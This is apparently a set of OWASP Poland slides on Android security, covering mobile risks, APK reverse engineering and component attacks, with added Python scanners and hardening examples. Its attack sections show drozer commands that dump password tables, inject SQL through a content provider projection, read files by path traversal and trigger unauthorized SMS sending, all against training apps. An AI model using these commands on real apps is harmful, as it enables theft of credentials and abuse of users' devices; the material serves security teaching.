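# static final String/byte[] constants initialised from a literal: the usual home of a hardcoded key
CONST_DEF = re.compile(r'static\s+final\s+(?:String|byte\[\])\s+(\w+)\s*=\s*(?:"|\{|new\s+byte\[\])')


def check_transformation(transformation):
    """Finding for a Cipher.getInstance() transformation string, or None if acceptable."""
    parts = [p.strip().upper() for p in transformation.split("/")]
    algorithm = parts[0]
    if algorithm in WEAK_CIPHERS:
        return "weak cipher %s" % algorithm
    if len(parts) == 1:
        return "%s with no mode given: the provider default is ECB" % algorithm
    if parts[1] == "ECB":
        return "%s in ECB mode" % algorithm
    return None


def scan_java(source):
    """Return (line_number, finding) pairs for a decompiled Java source file."""
    lines = source.splitlines()
    # First pass: names of literal constants, so a key assigned on one line and
    # used on another is still caught.
    constants = {m.group(1) for line in lines for m in CONST_DEF.finditer(line)}
    findings = []
    for number, line in enumerate(lines, 1):
        for m in CIPHER_CALL.finditer(line):
            finding = check_transformation(m.group(1))
            if finding:
                findings.append((number, finding))
        for m in DIGEST_CALL.finditer(line):
            if m.group(1).upper().replace("-", "") in WEAK_DIGESTS:
                findings.append((number, "weak digest %s" % m.group(1)))
        for m in KEYSPEC_CALL.finditer(line):
            key_arg = m.group(1).strip()
            literal = key_arg.startswith('"') or key_arg.startswith("new byte[]")
            from_constant = any(re.search(r"\b%s\b" % re.escape(c), key_arg) for c in constants)
            if literal or from_constant:
                findings.append((number, "hardcoded key material in SecretKeySpec"))
    return findings


# Constructed sample of what a decompiler hands back; not code from any real app.
SAMPLE_JAVA = """\
public class DbCrypto {
    private static final String KEY = "s3cr3tk3y1234567";
    static byte[] encrypt(byte[] data) throws Exception {
        SecretKeySpec key = new SecretKeySpec(KEY.getBytes("UTF-8"), "AES");
        Cipher c = Cipher.getInstance("AES");
        c.init(Cipher.ENCRYPT_MODE, key);
        return c.doFinal(data);
    }
    static String hashPin(String pin) throws Exception {
        MessageDigest md = MessageDigest.getInstance("MD5");
        return toHex(md.digest(pin.getBytes()));
    }
    static byte[] legacy(byte[] data, SecretKey k) throws Exception {
        Cipher c = Cipher.getInstance("DES/CBC/PKCS5Padding");
        c.init(Cipher.DECRYPT_MODE, k);
        return c.doFinal(data);
    }
    static byte[] modern(byte[] data, SecretKey k, byte[] iv) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, k, new GCMParameterSpec(128, iv));
        return c.doFinal(data);
    }
}
"""
```

Run it over every .java file the decompiler wrote; a key that is built at runtime from a user password (the "password-based encryption" mitigation below) does not trip the SecretKeySpec check, which is the point of that mitigation.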
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Other applications via intents/content providers
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into a local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:

    // implicit intent: let the system pick an app that can display the URL
    Intent view = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    // implicit intent: ask whatever camera app is installed to take a picture
    Intent capture = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:

    dz> run scanner.provider.injection -a <package_name>

• Data path traversal:

    dz> run scanner.provider.traversal -a <package_name>

• Intent injections:

    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm://" prefix allows remote installation of ANY application while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid intent filters on internal components. A component with an intent filter is exported by default, so set android:exported="false" on it; and whenever an app sends an implicit Intent, another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed or retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
Source: http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
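To make the points above concrete, an added example (not code from the slides): a server-side session store that issues random 256-bit tokens, lets idle sessions expire, destroys a session when the user on a device changes, and invalidates on logout; next to it, the device-ID-derived token the slide warns about. Times are passed in explicitly so the expiry can be exercised directly; the timeout value is arbitrary.

```python
import hashlib
import secrets

IDLE_TIMEOUT = 30 * 60   # seconds of inactivity after which a session is dead


def weak_token(device_id):
    """The anti-pattern from the slide: a token anyone who knows (or guesses) the
    device ID can reproduce, and which never changes or expires."""
    return hashlib.md5(device_id.encode()).hexdigest()


class SessionStore:
    """Server-side sessions: random tokens, idle expiry, explicit destruction."""

    def __init__(self):
        self._sessions = {}   # token -> {"user": str, "last_seen": float}

    def login(self, user, now, replacing=None):
        """Issue a fresh token. If the client presents the token of the session it is
        replacing (user switch on the same device), that session is destroyed first."""
        if replacing is not None:
            self.logout(replacing)
        token = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self._sessions[token] = {"user": user, "last_seen": now}
        return token

    def user_for(self, token, now):
        """Resolve a token to its user, or None. An expired session is removed, not
        just rejected, so the token cannot be revived later."""
        session = self._sessions.get(token)
        if session is None:
            return None
        if now - session["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[token]
            return None
        session["last_seen"] = now                  # sliding idle window
        return session["user"]

    def logout(self, token):
        """Server-side invalidation: forgetting the token on the client is not enough."""
        self._sessions.pop(token, None)

    def logout_everywhere(self, user):
        """Destroy every session of a user (password change, compromise report)."""
        for token in [t for t, s in self._sessions.items() if s["user"] == user]:
            del self._sessions[token]

    def active_count(self):
        return len(self._sessions)
```

The checks on the "how to find" slide map onto this directly: replaying a token after the idle window returns nothing, the old token dies when a different user logs in on the same device, and there is nothing to guess because the token carries no user or device information.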
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering amp Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
  – APK Optic
  – Astro File Manager
• Using ADB
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code (Smali)
• Why disassemble and not decompile?
Decompiling
DEX → JAR → Java
Decompiling – dex2jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
  – Java decompilers (JD-GUI closed source)
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
[Screenshots: JD-GUI and Luyten output]
Disassembling
DEX → Smali
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:

    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk

• Using AppUse
Demo Time
• Demo: decompiling with Luyten
• Demo: modifying Smali files
• Demo
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest file. Note the following:
• Permissions
    <uses-permission android:name="string" />
    <permission android:protectionLevel="…" />
• Components and their attributes
[Figure: sample AndroidManifest.xml]
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
Attributes that matter for every component type (Activities, Services, Content providers, Broadcast receivers):
• debuggable
• enabled
• exported
• permission
[Figure: example component attributes]
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.

    Intent intent = new Intent(Intent.ACTION_VIEW);
    intent.setData(Uri.parse("http://www.google.com"));
    String pack = "com.android.browser";
    ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
    intent.setComponent(comp);
    startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC – the leading security assessment framework for Android.
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)

    dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity

Drozer
It is installed in the default package of AppUse; it works over adb, so it is enough to just "click and play".
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app.
Activities
Activity components: attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused.
• By launching it with intents it is possible to achieve the following:
  – Modify data in the background
  – Trick the user
  – Leak sensitive information
Activities
Activity components: attacks
• General hijacking scheme
  [Diagram: components A, B and E]
• Results of an attack:
  – A malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one
  – Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activities
Activity components: attacks
• List and launch exported activities

    dz> run app.activity.info -a com.mwr.example.sieve
    Package: com.mwr.example.sieve
      com.mwr.example.sieve.FileSelectActivity
      com.mwr.example.sieve.MainLoginActivity
      com.mwr.example.sieve.PWList
    dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

Activity components: demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file.
Services
Services: attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack).
Services
Services: attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device.
Content providers
Content providers
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions:

    run app.provider.info --permission null
Content providers
Content providers: attacks
• Unrestricted access to the app database
  – Just query it: run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command.
Content providers

    dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers: attacks
• Unrestricted access to the app database
Content providers

    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys/
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers: attacks
• SQL injection
Content providers

    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key--"
    | Password         | pin  |
    | thisismypassword | 9876 |
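Why the selection and projection tricks above work, and how to close them, as an added example in Python with sqlite3 (not Sieve's Java and not part of the workshop material): the Key and Passwords tables are constructed to mirror the drozer output, vulnerable_query splices caller-controlled strings into the SQL text the way the provider does, and hardened_query allowlists columns and binds values. On Android the equivalent fix is SQLiteQueryBuilder with setProjectionMap()/setStrict() plus selectionArgs.

```python
"""Projection/selection injection in a content provider, reproduced with
sqlite3.  Added example, not Sieve's Java; the database below is constructed
to mirror the Key and Passwords tables shown in the drozer output."""
import sqlite3

# Columns the Passwords table really has; the hardened provider accepts no others.
PASSWORD_COLUMNS = ("_id", "service", "username", "password")


def make_db():
    """Constructed in-memory stand-in for Sieve's database.db."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Key VALUES ('thisismypassword', '9876');
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,
                                username TEXT, password BLOB);
        INSERT INTO Passwords (service, username, password)
            VALUES ('mail', 'alice', X'DEADBEEF');
    """)
    return conn


def vulnerable_query(conn, projection, selection):
    """The Sieve pattern: caller-supplied projection and selection are spliced
    straight into the SQL text, so a projection of '* FROM Key--' turns the
    statement into 'SELECT * FROM Key-- FROM Passwords' and a lone quote in
    the selection yields sqlite's 'unrecognized token' error."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM Passwords" % cols
    if selection:
        sql += " WHERE (%s)" % selection
    return conn.execute(sql).fetchall()


def hardened_query(conn, projection, filters):
    """Allowlisted projection; filters is {column: value} bound with '?' so
    values never become SQL.  Unknown columns are rejected, not escaped."""
    cols = tuple(projection) if projection else PASSWORD_COLUMNS
    unknown = [c for c in cols if c not in PASSWORD_COLUMNS]
    unknown += [c for c in (filters or {}) if c not in PASSWORD_COLUMNS]
    if unknown:
        raise ValueError("unknown column(s): %s" % ", ".join(unknown))
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    args = ()
    if filters:
        sql += " WHERE " + " AND ".join("%s = ?" % c for c in filters)
        args = tuple(filters.values())
    return conn.execute(sql, args).fetchall()


def run_safely(fn, *args):
    """Return ("ok", rows) or ("error", "<ExceptionType>: <message>")."""
    try:
        return "ok", fn(*args)
    except (sqlite3.Error, ValueError) as exc:
        return "error", "%s: %s" % (type(exc).__name__, exc)


if __name__ == "__main__":
    db = make_db()
    print(run_safely(vulnerable_query, db, ["* FROM Key--"], None))
    print(run_safely(vulnerable_query, db, None, "'"))
    print(run_safely(hardened_query, db, ["* FROM Key--"], None))
    print(run_safely(hardened_query, db, ["service", "username"], {"username": "alice"}))
```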
Content providers: attacks
• Path traversal
Content providers
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application

    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost
    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
    Written 24576 bytes

Content providers: demo
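The defender's side of the traversal shown above, as an added example in Python (not Sieve's FileBackupProvider and not part of the workshop material): a file-serving provider that opens whatever path the URI carries is compared with one that canonicalises the request and serves only regular files below its export directory, which also catches a symlink planted inside that directory. The directory layout is constructed in a temporary folder.

```python
"""Path traversal through a file-serving content provider, and the check
that closes it.  Added example (Python, not Sieve's FileBackupProvider);
the directory layout is constructed in a temp dir."""
import os
import tempfile


def vulnerable_resolve(uri_path):
    """Sieve-style: whatever path the content URI carries is what gets opened,
    so content://.../FileBackupProvider/etc/hosts reads /etc/hosts."""
    return uri_path


def safe_resolve(base_dir, uri_path):
    """Serve only regular files that really live under base_dir.  Canonicalise
    both sides first so '..' segments and symlinks inside base_dir cannot
    point outside it.  Returns the canonical path, or None when rejected."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if not candidate.startswith(base + os.sep):
        return None          # escaped the export directory (or is the directory itself)
    if not os.path.isfile(candidate):
        return None          # directories, devices and missing files are never served
    return candidate


def build_fixture():
    """Constructed layout: <root>/backup/database.db is the only file the
    provider should ever hand out; <root>/secret.txt must stay unreachable.
    Returns (root, export_dir, symlink_created)."""
    root = tempfile.mkdtemp(prefix="backupprov-")
    base = os.path.join(root, "backup")
    os.mkdir(base)
    with open(os.path.join(base, "database.db"), "w") as fh:
        fh.write("constructed sample database\n")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "w") as fh:
        fh.write("not for export\n")
    # A symlink planted inside the export directory that points outside it.
    link_ok = True
    try:
        os.symlink(secret, os.path.join(base, "link"))
    except OSError:
        link_ok = False
    return root, base, link_ok


if __name__ == "__main__":
    root, base, link_ok = build_fixture()
    for req in ("database.db", "../secret.txt", "/etc/hosts", "link", ""):
        print("%-14r vulnerable=%r safe=%r" % (req, vulnerable_resolve(req), safe_resolve(base, req)))
```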
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "battery low", "boot completed", "headset plugged", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.
Broadcast receivers
Broadcast receivers: attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Broadcast receivers
Broadcast receivers: attacks

    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
        <intent-filter>
            <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
        </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />

Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers: attacks

    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        sms.sendTextMessage(bundle.getString("phoneNumber"), null,
                bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }

The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action.
Broadcast receivers
Broadcast receivers: attacks

    run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED

Broadcast receivers
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
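A manifest check for the two defenses above, as an added example in Python (not part of the workshop material): it parses an apktool-decoded AndroidManifest.xml, applies the platform's export defaults (an explicit android:exported wins; otherwise an <intent-filter> exports the component, and a <provider> is exported by default when minSdkVersion is below 17), skips the launcher activity, and reports exported components that carry no android:permission or one the app declares at normal/dangerous level, plus android:debuggable. The sample manifest is constructed and models the GoatDroid receiver and Sieve components discussed above.

```python
"""Audit a decoded AndroidManifest.xml for exported components that lack a
permission (or carry a weak one) and for android:debuggable.  Added example;
SAMPLE_MANIFEST is constructed and not taken from any real app."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "provider", "receiver")
LAUNCHER = "android.intent.category.LAUNCHER"


def _attr(elem, name):
    """Read an android:<name> attribute; None when absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_launcher(comp):
    """The launcher activity has to be exported, so it is not reported."""
    return any(_attr(cat, "name") == LAUNCHER
               for f in comp.findall("intent-filter")
               for cat in f.findall("category"))


def is_exported(comp, min_sdk):
    """Platform defaults: explicit android:exported wins; otherwise an
    <intent-filter> exports the component, and a <provider> is exported by
    default when minSdkVersion is below 17."""
    explicit = _attr(comp, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if comp.find("intent-filter") is not None:
        return True
    return comp.tag == "provider" and min_sdk < 17


def audit_manifest(xml_text):
    """Return a list of (kind, name, issue) tuples for the manifest text."""
    root = ET.fromstring(xml_text)
    findings = []
    uses_sdk = root.find("uses-sdk")
    min_sdk = int(_attr(uses_sdk, "minSdkVersion") or 1) if uses_sdk is not None else 1
    # protectionLevel of the app's own <permission> declarations (default: normal)
    levels = {_attr(p, "name"): (_attr(p, "protectionLevel") or "normal")
              for p in root.findall("permission")}
    app = root.find("application")
    if app is None:
        return findings
    if (_attr(app, "debuggable") or "false").lower() == "true":
        findings.append(("application", root.get("package", "?"), "android:debuggable=true"))
    for tag in COMPONENT_TAGS:
        for comp in app.findall(tag):
            name = _attr(comp, "name") or "?"
            if not is_exported(comp, min_sdk) or is_launcher(comp):
                continue
            perm = _attr(comp, "permission")
            if perm is None:
                findings.append((tag, name, "exported without android:permission"))
            elif levels.get(perm) in ("normal", "dangerous"):
                # Any app can request a normal/dangerous permission; only
                # signature (or signatureOrSystem) ties access to the same key.
                findings.append((tag, name, "guarded only by %s-level permission %s"
                                 % (levels[perm], perm)))
    return findings


# Constructed sample: one app mixing the weak and the hardened patterns.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sample">
  <uses-sdk android:minSdkVersion="16" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <permission android:name="com.example.sample.ADMIN" android:protectionLevel="signature" />
  <permission android:name="com.example.sample.WEAK" />
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true" />
    <activity android:name=".Internal" android:exported="false" />
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver">
      <intent-filter><action android:name="com.example.sample.SOCIAL_SMS" /></intent-filter>
    </receiver>
    <receiver android:name=".AdminReceiver" android:exported="true"
              android:permission="com.example.sample.ADMIN" />
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.sample.WEAK" />
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.sample.DBContentProvider" />
  </application>
</manifest>"""

if __name__ == "__main__":
    for kind, name, issue in audit_manifest(SAMPLE_MANIFEST):
        print("%-12s %-45s %s" % (kind, name, issue))
```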
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications.
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or reversible encoding).
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages

    adb pull /data/data/<apk_package_name>
Insecure data storage – demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage – mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning – theory
• The expected X.509 certificate or public key is embedded in the source code

    if (presented_cert == pinned_cert)
        Start_connection();
    else
        Drop_connection();
Cert Pinning – reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
